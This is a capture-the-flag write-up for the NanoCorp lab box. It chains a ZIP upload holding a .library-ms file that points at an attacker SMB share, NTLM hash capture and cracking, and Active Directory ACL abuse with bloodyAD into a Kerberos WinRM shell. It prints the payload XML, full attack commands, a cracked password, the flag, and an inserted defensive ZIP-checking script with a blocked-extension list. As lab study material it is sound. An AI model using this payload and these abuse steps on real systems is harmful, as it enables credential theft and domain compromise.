Pentest Notes – NanoCorp Foothold Chain

Date: 2026-01-08
Box: HTB — NanoCorp (Pentest Study Note)

NanoCorp – ZIP Upload → NTLM Leak → AD ACL Abuse → Kerberos WinRM → user.txt

Initial recon indicated a web service on 80 and a full AD Domain Controller surface (53/88/389/445/5986). A web upload workflow on hire.nanocorp.htb extracted attacker-supplied ZIPs server-side. By embedding a Windows .library-ms that referenced an attacker SMB path, the server performed outbound NTLM authentication, leaking NANOCORP\web_svc NetNTLMv2. After cracking the hash, BloodHound revealed an ACL chain: IT_SUPPORT had GenericAll over monitoring_svc. The path was abused by adding web_svc to IT_SUPPORT, resetting monitoring_svc’s password, obtaining a Kerberos TGT with kinit, and finally authenticating to WinRM over HTTPS (5986) using Kerberos to retrieve user.txt.
Tags: ZIP Upload, CVE-2025-24071, AD DC, NTLMv2 Leak, Kerberos, WinRM over HTTPS (5986), No Root

0. Summary

Full chain, step by step:

  1. Full port scan identifies Web + Domain Controller + WinRM (5986) surface.
  2. Discover hire.nanocorp.htb upload feature that extracts ZIP server-side.
  3. Trigger outbound NTLM via embedded .library-ms referencing attacker SMB share.
  4. Capture NetNTLMv2 for NANOCORP\web_svc with Responder.
  5. Crack NetNTLMv2 to recover plaintext password for web_svc.
  6. Use BloodHound to identify ACL path: IT_SUPPORT → monitoring_svc (GenericAll).
  7. Abuse AD: add web_svc to IT_SUPPORT, reset monitoring_svc password.
  8. Obtain Kerberos TGT with kinit and confirm with klist.
  9. Kerberos-auth to WinRM over HTTPS (5986) and read user.txt.
Note
I have failed to perform LPE and obtain root privileges.

1. Initial Recon

1-1. Full port scan

sudo nmap -sV -sC -p- 10.10.11.93 -oA portScan --min-rate=1000

1-2. Key services identified

  • 80/tcp – Apache/PHP web
  • 53, 88, 389, 445 – AD DC surface (DNS/Kerberos/LDAP/SMB)
  • 5986/tcp – WinRM over HTTPS
  • SMB signing required

2. Web – Subdomain + ZIP upload/extract behavior

2-1. Behavior observed

  • Visited: hire.nanocorp.htb (job application portal)
  • Confirmed upload workflow performs server-side extraction of ZIP archives

2-2. Upload filtering evidence

# Attempt: trivial zip (e.g., touch hello.zip)
# Result: "Invalid file type"
# Inference: header/magic-number validation

2-3. Successful ZIP upload evidence

File Uploaded and Extracted Successfully
Why this matters
“Extracted Successfully” strongly implies the application is not only storing uploads but also parsing/unzipping them. That creates a path to force the server to interact with files that can reference remote resources.

3. NTLM Hash Leak – Forced outbound authentication

The goal was to make the server touch a remote SMB resource during/after ZIP extraction, causing NTLM authentication. A .library-ms file was used to reference an attacker-controlled SMB share.

3-1. Payload: .library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\10.10.14.37\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

3-2. Trigger

  • Embed the .library-ms inside a valid ZIP
  • Upload ZIP to hire.nanocorp.htb so the server extracts it
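As an added example that is not part of the original write-up, here is the pre-extraction check that would have rejected the upload from 3-1: it walks the archive listing before anything is unpacked, refuses entries whose file type makes Windows resolve a remote location when merely parsed, and reads any .library-ms to report the UNC path it points at. The blocked-extension list, the function names and the constructed sample archive are assumptions.

```python
import io
import os
import xml.etree.ElementTree as ET
import zipfile

# File types Windows resolves against a remote path when merely parsed or rendered;
# .library-ms is the one used in section 3. The list itself is an assumption.
BLOCKED_EXTENSIONS = {".library-ms", ".lnk", ".url", ".scf", ".searchconnector-ms"}
LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"

def find_unc_urls(library_ms_xml: bytes) -> list[str]:
    """Return every <url> in a .library-ms that points at a UNC/SMB location."""
    root = ET.fromstring(library_ms_xml)
    urls = [u.text.strip() for u in root.iter(LIBRARY_NS + "url") if u.text]
    return [u for u in urls if u.startswith("\\\\") or u.lower().startswith("smb:")]

def inspect_zip(data: bytes) -> list[str]:
    """Reasons the archive must NOT be extracted; an empty list means it is clean."""
    reasons = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.startswith(("/", "\\")) or ".." in name.replace("\\", "/").split("/"):
                reasons.append(f"path traversal: {name}")  # zip-slip
            ext = os.path.splitext(name)[1].lower()
            if ext in BLOCKED_EXTENSIONS:
                reasons.append(f"blocked file type: {name}")
            if ext == ".library-ms":  # go one level deeper and read the payload itself
                for url in find_unc_urls(zf.read(info)):
                    reasons.append(f"remote location in {name}: {url}")
    return reasons

# Constructed sample: the part of the section 3 payload that triggers the lookup.
SAMPLE_LIBRARY_MS = (
    b'<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
    b"<searchConnectorDescriptionList><searchConnectorDescription><simpleLocation>"
    b"<url>\\\\10.10.14.37\\shared</url></simpleLocation></searchConnectorDescription>"
    b"</searchConnectorDescriptionList></libraryDescription>"
)

def build_sample_zip(with_payload: bool = True) -> bytes:
    """Constructed upload: a placeholder resume, optionally plus the .library-ms."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("resume.pdf", b"%PDF-1.4 placeholder")
        if with_payload:
            zf.writestr("open_me.library-ms", SAMPLE_LIBRARY_MS)
    return buf.getvalue()

print(inspect_zip(build_sample_zip()))  # stand-alone run lists the rejection reasons
```

The same listing pass is also where a size/entry-count limit belongs, since the extractor never has to touch a rejected archive.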

3-3. Capture NetNTLMv2 with Responder (evidence)

[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash     : web_svc::NANOCORP:...

4. Crack NetNTLMv2 → Recover plaintext password

4-1. Hashcat

hashcat -m 5600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat -m 5600 hash.txt --show

4-2. Result (evidence)

web_svc::NANOCORP:...:dksehdgh712!@#
Recovered credential
NANOCORP\web_svc : dksehdgh712!@#

5. AD Recon – BloodHound collection + ACL path discovery

5-1. Collect (LDAP-based)

bloodhound-python -c all -u 'web_svc' -p 'dksehdgh712!@#' \
  -ns 10.10.11.93 -d NANOCORP.HTB --zip

5-2. Observation

  • Kerberos TGT issues due to clock skew → NTLM fallback
  • Still succeeded in pulling objects / groups / ACL relationships via LDAP

5-3. Key relationship (core finding)

  • web_svc → member of / can reach IT_SUPPORT (this is what 6-1 uses to add web_svc to the group)
  • IT_SUPPORT → monitoring_svc: GenericAll

6. AD Abuse – Group membership + password reset

6-1. Add web_svc into IT_SUPPORT

bloodyAD --host 10.10.11.93 -d nanocorp.htb \
  -u 'web_svc' -p 'dksehdgh712!@#' \
  add groupMember IT_SUPPORT web_svc
[+] web_svc added to IT_SUPPORT

6-2. Reset monitoring_svc password via GenericAll

bloodyAD --host 10.10.11.93 -d nanocorp.htb \
  -u 'web_svc' -p 'dksehdgh712!@#' \
  set password monitoring_svc 'Happy123'
[+] Password changed successfully!
New credential
NANOCORP\monitoring_svc : Happy123

7. Kerberos – Issue TGT in-session (kinit/klist)

7-1. Obtain TGT

kinit monitoring_svc@NANOCORP.HTB

7-2. Verify ticket cache

klist
Default principal: monitoring_svc@NANOCORP.HTB
... krbtgt/NANOCORP.HTB@NANOCORP.HTB

8. WinRM over HTTPS (5986) – Kerberos authentication success

8-1. Kerberos WinRM session

KRB5CCNAME=/tmp/krb5cc_1000 python3 winrmexec.py -port 5986 -ssl \
  NANOCORP.HTB/'monitoring_svc:Happy123'@DC01.NANOCORP.HTB -k

8-2. Evidence (SPN request + shell)

[*] requesting TGT for ... monitoring_svc
[*] requesting TGS for HTTP/DC01.NANOCORP.HTB@NANOCORP.HTB
PS C:\Users\monitoring_svc\Documents>
What this proves
The client successfully negotiated Kerberos for the WinRM HTTP SPN (HTTP/DC01...), resulting in an authenticated PowerShell session.

9. user.txt

9-1. Retrieve

cd ..\Desktop
ls
get-content user.txt

9-2. Evidence

ea897d8c1cc2f0270a208ec3c294584b

10. Root Causes Summary

Weakness / Condition → Impact

  • Server-side ZIP extraction in a web upload workflow → Allows attacker-controlled archive contents to be processed, enabling forced outbound interactions
  • Outbound SMB/NTLM authentication possible from server context → NetNTLMv2 credential material can be leaked to attacker infrastructure
  • Crackable NetNTLMv2 (weak password) → Transforms a hash capture into a working domain credential
  • AD ACL misconfiguration (GenericAll path) → Enables direct password reset / full control over another service account
  • WinRM exposed over HTTPS (5986) → Valid domain creds become an immediate interactive foothold (Kerberos-auth shell)

11. Key Takeaways

  • “Extract on upload” is not harmless. If archives contain references that trigger network access, it becomes an auth-leak vector.
  • NetNTLMv2 leaks are often “one crack away” from domain creds. Password quality decides how fast the chain collapses.
  • ACL paths are real privilege escalation. GenericAll on an account is basically “reset and become them.”
  • Kerberos WinRM is a clean post-exploitation lane. Once you have a TGT, SPN-based service access becomes deterministic.

Overall: a precise, evidence-backed chain from web upload behavior to AD object control and WinRM foothold.